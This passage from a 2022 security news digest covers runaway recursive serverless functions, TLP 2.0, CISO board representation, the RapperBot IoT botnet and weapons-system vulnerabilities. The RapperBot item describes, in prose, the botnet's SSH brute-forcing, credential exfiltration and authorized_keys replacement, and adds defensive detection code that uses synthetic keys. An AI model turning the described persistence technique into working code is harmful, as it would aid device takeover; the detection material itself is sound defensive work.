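        invocations += 1
        try:
            handler(event, queue.append)
        except RecursionGuardTripped:
            return invocations, "guard tripped"
    return invocations, "drained"

if __name__ == "__main__":
    for h in (handler_unguarded, handler_hop_limited, handler_guarded):
        print(f"{h.__name__:22} {simulate(h)}")
```

The simulation runs invocations one at a time; a real platform runs them concurrently, so the budget figure is reached in seconds rather than in a count you can watch. The hop counter alone is a seat belt, not a fix: the number of invocations it permits grows exponentially with fan-out, which is why separating input and output locations (or filtering triggers by prefix) is the control to insist on in review.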

Losio, Renato, Are Recursive Serverless Functions the Biggest Billing Risk on the Cloud?, InfoQ, 6 August 2022. Available online at https://www.infoq.com/news/2022/08/recursive-serverless-functions/.

Traffic Light Protocol Updated to Version 2.0

The Traffic Light Protocol, which governs the dissemination of threat intelligence, has seen its first significant update. The colour WHITE has been replaced by CLEAR (to avoid racial and ethnic overtones as well as the connotation of white being an additive mix of all the other colours) and a new marker, TLP:AMBER+STRICT, has been added. So there are now five levels:

  • TLP:RED - for the individual recipients only; you may act on the information but not pass it on; used when information cannot be effectively acted upon without significant risk to the privacy, reputation or operations of the organizations involved
  • TLP:AMBER+STRICT - may be shared within the recipient's organization only, on a need-to-know basis, but not with customers, business partners or suppliers
  • TLP:AMBER - may be shared on a need-to-know basis within the recipient's organization and also with its customers or clients
  • TLP:GREEN - may be circulated freely within your community (which, if not otherwise defined, is the cybersecurity/defence community), but not publicly nor outside the community
  • TLP:CLEAR - may be freely shared with the world

FIRST, TRAFFIC LIGHT PROTOCOL (TLP): FIRST Standards Definitions and Usage Guidance - Version 2.0, August 2022. Available online at https://www.first.org/tlp/.

Boards Now On Board with Security?

Not quite, not yet. According to a global survey report released by executive recruitment firm Heidrick & Struggles, only 12% of CISOs actually sit on the board of their company, but the situation is improving, in part due to pressure from regulators such as the SEC and ASIC and from the stock exchanges themselves. Gartner now predicts that 40% of boards will have a dedicated cybersecurity committee overseen by a qualified board member by 2025.

However, the board's growing awareness of cybersecurity incidents and breaches requires a change in approach from the CISO, as directors become inured to 'the sky is falling' pitches for budget increases. By now, many firms have lived through ransomware and other attacks and recovered to resume business as usual. A more measured approach, framing cybersecurity in the same business-risk terms the board applies to everything else, is required.

Aiello, Matt, et al., 2021 Global Chief Information Security Officer (CISO) Survey, Heidrick & Struggles, 2022. Available online at https://www.heidrick.com/en/insights/technology-officers/2021-global-chief-information-security-officer-ciso-survey.

Glover, Claudia, Cybersecurity on the board: How the CISO role is evolving for a new era, Tech Monitor, 5 August 2022. Available online at https://techmonitor.ai/technology/cybersecurity/ciso-on-the-board.

IoT Device SSH Servers Used to Form Botnet

A derivative of the Mirai botnet named RapperBot has been evolving rapidly since it was first discovered back in June. The malware scans for IoT devices and attempts to brute-force its way into their embedded SSH servers, and has now amassed over 3,500 IP addresses it uses for this purpose. Once it has broken into a device it exfiltrates the valid credentials back to its C2 infrastructure and, since mid-July, it has switched its emphasis from propagating further to maintaining remote access to the compromised devices, adding its own public key to the authorized_keys file on the victim. In a nasty twist, it also deletes the existing public keys, which will prevent administrators using key-based authentication from logging in to fix the issue. That makes unexpected changes to authorized_keys, and in particular the disappearance of approved keys, a high-value detection signal on any fleet of SSH-exposed devices.
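Here is an added example (not code from the Hacker News article or the Fortinet research behind it) of the detection logic a practitioner would want: diff a device's live authorized_keys against an approved baseline, fingerprint each key the way ssh-keygen does, and flag the wipe-and-replace pattern described above as a compromise rather than a mere drift. The baseline and compromised files are constructed, and the key blobs are synthetic (correct OpenSSH wire layout, random-looking bytes) so that they fingerprint but cannot be used as keys.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com")

def fake_blob(key_type: str, seed: int) -> str:
    """Constructed key blob: real OpenSSH wire layout (length-prefixed type
    string, then key material) but synthetic key bytes."""
    body = bytes((seed * 7 + i) % 256 for i in range(32))
    wire = (len(key_type).to_bytes(4, "big") + key_type.encode("ascii")
            + len(body).to_bytes(4, "big") + body)
    return base64.b64encode(wire).decode("ascii")

def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint (as printed by ssh-keygen -l -E sha256)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")

def parse_authorized_keys(text: str) -> list:
    """Return (options, key_type, fingerprint, comment) for each key line.
    Options precede the key type; they are recovered by re-joining the
    fields before it, which is adequate here but not a full options parser."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            continue                              # malformed: sshd ignores it too
        options = " ".join(fields[:idx])
        comment = " ".join(fields[idx + 2:])
        entries.append((options, fields[idx], fingerprint(fields[idx + 1]), comment))
    return entries

def audit_authorized_keys(baseline_text: str, current_text: str) -> dict:
    """Diff the live file against the approved baseline and classify the result."""
    base = {e[2]: e for e in parse_authorized_keys(baseline_text)}
    cur = {e[2]: e for e in parse_authorized_keys(current_text)}
    added = sorted(fp for fp in cur if fp not in base)
    removed = sorted(fp for fp in base if fp not in cur)
    findings = []
    if added:
        findings.append("unexpected key added")
    if removed:
        findings.append("approved key removed: administrators may be locked out")
    if added and removed and len(cur) == len(added):
        # No approved key survives and only new keys remain: the file was
        # replaced wholesale, the persistence pattern described for RapperBot.
        findings.append("authorized_keys replaced wholesale: treat host as compromised")
    return {"added": [cur[fp] for fp in added],
            "removed": [base[fp] for fp in removed],
            "findings": findings}

# Constructed files: BASELINE is what the administrators approved,
# COMPROMISED is what a wipe-and-replace leaves behind.
BASELINE = f"""\
# administrators
ssh-ed25519 {fake_blob('ssh-ed25519', 1)} admin@console
no-pty,command="/usr/bin/rrsync /backup" ssh-rsa {fake_blob('ssh-rsa', 2)} backup@nas
"""
COMPROMISED = f"""\
ssh-rsa {fake_blob('ssh-rsa', 99)}
"""

if __name__ == "__main__":
    for finding in audit_authorized_keys(BASELINE, COMPROMISED)["findings"]:
        print(finding)
```

Run this from a collector that pulls each device's authorized_keys over an out-of-band channel, or feed it the file contents your file-integrity monitoring already captures; the baseline should live in configuration management, not on the device, since the device is what the attacker controls. Key-based login will already be broken on a host that trips the wholesale-replacement finding, so the response plan needs a console or management-port path back in.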

Lakshamanan, Ravie, New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack, The Hacker News, 6 August 2022. Available online at https://thehackernews.com/2022/08/new-iot-rapperbot-malware-targeting.html.

Weapons Systems Increasingly Complex, Increasingly Vulnerable

As high-tech weapons systems become more complex and rely increasingly on networked digital components, they are becoming harder to secure. An opinion piece in The Hill calls attention to the need to address the national security risk posed by vulnerabilities in weapons systems ranging from the B-2 Spirit bomber, through tactical radio systems, down to the engine and transmission controllers of ground combat vehicles.

Gates, Alexander, US strategic advantage depends upon addressing cybersecurity vulnerabilities of weapon systems, The Hill, 6 August 2022. Available online at https://thehill.com/opinion/cybersecurity/3591153-us-strategic-advantage-depends-upon-addressing-cybersecurity-vulnerabilities-of-weapon-systems/.



[ Modified: Monday, August 8, 2022, 10:32 AM ]